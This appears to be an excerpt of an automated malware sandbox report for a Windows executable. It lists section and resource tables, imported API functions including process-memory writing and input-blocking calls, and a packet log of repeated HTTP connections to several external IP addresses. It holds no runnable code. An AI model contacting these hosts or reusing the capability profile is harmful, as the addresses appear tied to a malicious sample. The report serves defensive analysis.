                  .reloc | 0x121000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                  RT_ICON | 0xc8488 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                  RT_ICON | 0xc85b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                  RT_ICON | 0xc86d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                  RT_ICON | 0xc8800 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.28189493433395874
                  RT_ICON | 0xc98a8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.5487588652482269
                  RT_MENU | 0xc9d10 | 0x50 | data | English | Great Britain | 0.9
                  RT_STRING | 0xc9d60 | 0x594 | data | English | Great Britain | 0.3333333333333333
                  RT_STRING | 0xca2f4 | 0x68a | data | English | Great Britain | 0.2747909199522103
                  RT_STRING | 0xca980 | 0x490 | data | English | Great Britain | 0.3715753424657534
                  RT_STRING | 0xcae10 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                  RT_STRING | 0xcb40c | 0x65c | data | English | Great Britain | 0.34336609336609336
                  RT_STRING | 0xcba68 | 0x466 | data | English | Great Britain | 0.3605683836589698
                  RT_STRING | 0xcbed0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                  RT_RCDATA | 0xcc028 | 0x5413c | data | | | 1.0003368372147048
                  RT_GROUP_ICON | 0x120164 | 0x22 | data | English | Great Britain | 1.0588235294117647
                  RT_GROUP_ICON | 0x120188 | 0x14 | data | English | Great Britain | 1.25
                  RT_GROUP_ICON | 0x12019c | 0x14 | data | English | Great Britain | 1.15
                  RT_GROUP_ICON | 0x1201b0 | 0x14 | data | English | Great Britain | 1.25
                  RT_VERSION | 0x1201c4 | 0xdc | data | English | Great Britain | 0.6181818181818182
                  RT_MANIFEST | 0x1202a0 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                  DLL | Import
                  WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                  VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                  WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                  COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                  MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                  WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                  PSAPI.DLL | GetProcessMemoryInfo
                  IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                  USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                  UxTheme.dll | IsThemeActive
                  KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                  USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                  GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                  COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
                  ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                  SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                  ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                  OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                  Language of compilation system | Country where language is spoken
                  English | Great Britain
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Sep 4, 2024 09:36:59.591617107 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.591634989 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.591635942 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:59.591635942 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:59.591653109 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:59.591672897 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.591711044 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:59.596539021 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.596550941 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.596561909 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.596575022 CEST804975566.29.149.180192.168.2.4
                  Sep 4, 2024 09:36:59.596587896 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:36:59.596617937 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:00.368001938 CEST4975580192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:01.388530970 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:01.393374920 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.393439054 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:01.406809092 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:01.411660910 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411672115 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411689043 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411696911 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411704063 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411833048 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411854982 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411880016 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:01.411889076 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032790899 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032810926 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032818079 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032823086 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032830954 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032933950 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032944918 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032957077 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.032959938 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:02.033020973 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:02.033020973 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:02.033037901 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.033061981 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.039434910 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:02.039450884 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.039463043 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.039473057 CEST804975666.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:02.039504051 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:02.044302940 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:02.914897919 CEST4975680192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:03.965692997 CEST4975780192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:03.970783949 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:03.970853090 CEST4975780192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:04.015805006 CEST4975780192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:04.020812035 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569159031 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569180012 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569190025 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569200993 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569217920 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569228888 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569240093 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569283009 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569293976 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569305897 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.569335938 CEST4975780192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:04.569434881 CEST4975780192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:04.574182034 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.574220896 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.574234009 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:04.575494051 CEST4975780192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:04.577429056 CEST4975780192.168.2.466.29.149.180
                  Sep 4, 2024 09:37:04.582207918 CEST804975766.29.149.180192.168.2.4
                  Sep 4, 2024 09:37:09.901802063 CEST4975880192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:09.906800985 CEST8049758103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:09.906862020 CEST4975880192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:09.917349100 CEST4975880192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:09.922164917 CEST8049758103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:10.520262957 CEST8049758103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:10.520303965 CEST8049758103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:10.521148920 CEST4975880192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:11.430546999 CEST4975880192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:12.449377060 CEST4975980192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:12.454302073 CEST8049759103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:12.456543922 CEST4975980192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:12.467273951 CEST4975980192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:12.472111940 CEST8049759103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:13.213840008 CEST8049759103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:13.213860989 CEST8049759103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:13.213870049 CEST8049759103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:13.213917971 CEST4975980192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:13.213917971 CEST4975980192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:13.977492094 CEST4975980192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:14.995584011 CEST4976080192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:15.000669003 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.001426935 CEST4976080192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:15.011987925 CEST4976080192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:15.016786098 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016796112 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016872883 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016881943 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016887903 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016942024 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016949892 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016989946 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.016999006 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.711798906 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.711815119 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.711823940 CEST8049760103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:15.711879015 CEST4976080192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:16.525377989 CEST4976080192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:17.542634964 CEST4976180192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:17.547518015 CEST8049761103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:17.547594070 CEST4976180192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:17.554378986 CEST4976180192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:17.559164047 CEST8049761103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:18.200239897 CEST8049761103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:18.200257063 CEST8049761103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:18.200707912 CEST8049761103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:18.200994015 CEST4976180192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:18.203457117 CEST4976180192.168.2.4103.224.182.242
                  Sep 4, 2024 09:37:18.208215952 CEST8049761103.224.182.242192.168.2.4
                  Sep 4, 2024 09:37:24.010704041 CEST4976280192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:24.015542984 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.015603065 CEST4976280192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:24.025834084 CEST4976280192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:24.030841112 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.906677008 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.906693935 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.906702995 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.906717062 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.906727076 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.906738043 CEST804976218.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:24.906785011 CEST4976280192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:24.906831980 CEST4976280192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:25.539880991 CEST4976280192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:26.561384916 CEST4976380192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:26.566247940 CEST804976318.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:26.569469929 CEST4976380192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:26.579575062 CEST4976380192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:26.588922977 CEST804976318.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:27.457389116 CEST804976318.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:27.457405090 CEST804976318.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:27.457416058 CEST804976318.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:27.457427979 CEST804976318.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:27.457441092 CEST804976318.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:27.457453966 CEST4976380192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:27.457488060 CEST4976380192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:28.087001085 CEST4976380192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:29.106096983 CEST4976480192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:29.111088037 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.111155033 CEST4976480192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:29.123729944 CEST4976480192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:29.129125118 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129136086 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129153013 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129160881 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129168987 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129673958 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129682064 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129720926 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:29.129729986 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.109544039 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.109559059 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.109569073 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.109941959 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.109978914 CEST4976480192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:30.113456011 CEST4976480192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:30.312815905 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.312908888 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.312969923 CEST804976418.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:30.313204050 CEST4976480192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:30.634057999 CEST4976480192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:31.660988092 CEST4976580192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:31.665873051 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:31.665931940 CEST4976580192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:31.677473068 CEST4976580192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:31.683084011 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:32.553404093 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:32.553422928 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:32.553436041 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:32.553447962 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:32.553461075 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:32.553548098 CEST4976580192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:32.553627014 CEST4976580192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:32.557380915 CEST4976580192.168.2.418.183.3.45
                  Sep 4, 2024 09:37:32.562155962 CEST804976518.183.3.45192.168.2.4
                  Sep 4, 2024 09:37:45.743464947 CEST4976680192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:45.748267889 CEST8049766176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:45.748337030 CEST4976680192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:45.760468006 CEST4976680192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:45.765259981 CEST8049766176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:46.410078049 CEST8049766176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:46.410183907 CEST8049766176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:46.411505938 CEST4976680192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:47.274362087 CEST4976680192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:48.293404102 CEST4976780192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:48.298516035 CEST8049767176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:48.301503897 CEST4976780192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:48.313395023 CEST4976780192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:48.318252087 CEST8049767176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:49.057904005 CEST8049767176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:49.057925940 CEST8049767176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:49.057934999 CEST8049767176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:49.061389923 CEST4976780192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:49.821177959 CEST4976780192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:50.840095043 CEST4976880192.168.2.4176.57.64.102
